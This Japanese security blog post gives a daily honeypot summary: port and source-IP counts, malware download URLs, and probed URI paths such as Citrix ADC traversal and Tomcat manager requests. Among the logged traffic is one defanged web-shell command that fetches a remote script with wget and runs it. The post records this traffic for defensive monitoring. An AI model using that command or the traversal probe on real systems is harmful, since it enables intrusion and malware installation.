sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/18)

ポート80番にもCitrix ADC/Citrix Gateway脆弱性を狙った通信が来てました。
/vpn/[.][.]/vpns/cfg/smb[.]conf 

<Honeytrap>

Local Port Top 10
LocalPort Count
1433 426909 件
445 1200 件
3389 926 件
139 559 件
3391 172 件
81 55 件
52869 50 件
27017 43 件


Remote IP Top 10
RemoteIP Count
153[.]150[.]56[.]210 29911 件
125[.]160[.]67[.]61 29906 件
36[.]79[.]250[.]161 29899 件
113[.]161[.]25[.]41 29890 件
113[.]161[.]192[.]227 29859 件
39[.]52[.]109[.]19 29094 件
86[.]98[.]212[.]179 26546 件
188[.]129[.]220[.]93 26341 件

Malware
Malware Count
No Malware 433579 件
hxxp://51[.]77[.]213[.]109/mips 9 件
hxxp://91[.]92[.]66[.]124/ 2 件
hxxp://188[.]209[.]49[.]244/aa/arm7 1 件
hxxp://89[.]35[.]39[.]74/jaws[.]sh 1 件
hxxp://51[.]81[.]117[.]21/kttp[.]mips 1 件
hxxp://167[.]172[.]155[.]138/EkSgsEdbins[.]sh 1 件

 

<wowhoneypot>
URI Path
URI PATH Count
/manager/html Target:Tomcat 204 件
/ Target:- 25 件
/admin/assets/js/views/login[.]js Target:FreePBX 13 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/shell Target:wegshell 4 件
/robots[.]txt Target:text 2 件
/vpn/[.][.]/vpns/cfg/smb[.]conf Target:Citrix ADC/Citrix Gateway 1 件
hxxp://112[.]35[.]53[.]83:8088/index[.]php Target:new path 1 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 1 件
hxxp://123[.]125[.]114[.]144/ Target:new path 1 件
hxxp://www[.]123cha[.]com/ Target:new path 1 件
www[.]baidu[.]com:443 Target:new path 1 件
cn[.]bing[.]com:443 Target:new path 1 件
www[.]ipip[.]net:443 Target:new path 1 件

Remote IP Top 10RemoteIP Count
59[.]12[.]215[.]20 204 件
77[.]247[.]108[.]77 20 件
77[.]247[.]108[.]119 8 件
74[.]63[.]227[.]26 2 件
193[.]57[.]40[.]46 2 件
175[.]101[.]144[.]181 1 件
187[.]154[.]170[.]82 1 件
45[.]224[.]166[.]119 1 件

 

All URI
URI Count
/manager/html Target:Tomcat 204 件
/ Target:- 24 件
/admin/assets/js/views/login[.]js Target:FreePBX 13 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/shell?cd+/tmp;rm+-rf+[.]j;wget+hxxp:/\/91[.]92[.]66[.]124/[.][.]j/[.]j;chmod+777+[.]j;sh+[.]j;echo+DONE Target:wegshell 4 件
/robots[.]txt Target:text 2 件
/vpn/[.][.]/vpns/cfg/smb[.]conf Target:Citrix ADC/Citrix Gateway 1 件
hxxp://112[.]35[.]53[.]83:8088/index[.]php Target:new path 1 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 1 件
hxxp://123[.]125[.]114[.]144/ Target:new path 1 件
/?XDEBUG_SESSION_START=phpstorm Target:new path 1 件
hxxp://www[.]123cha[.]com/ Target:new path 1 件
www[.]baidu[.]com:443 Target:new path 1 件
cn[.]bing[.]com:443 Target:new path 1 件
www[.]ipip[.]net:443 Target:new path 1 件

 

<wowhoneypotssl>
URI Path
URI PATH Count
/admin/assets/js/views/login[.]js Target:FreePBX 13 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/ Target:- 5 件
/RDWeb/Pages/ Target:new path 2 件
/api/v1 Target:new path 1 件


Remote IP Top 10RemoteIP Count
77[.]247[.]108[.]77 20 件
77[.]247[.]108[.]119 8 件
172[.]105[.]78[.]74 1 件
221[.]213[.]75[.]163 1 件
139[.]59[.]208[.]177 1 件
178[.]79[.]172[.]231 1 件
74[.]82[.]47[.]3 1 件
209[.]17[.]96[.]74 1 件


All URI
URI Count
/admin/assets/js/views/login[.]js Target:FreePBX 13 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/ Target:- 5 件
/RDWeb/Pages/ Target:new path 2 件
/api/v1 Target:new path 1 件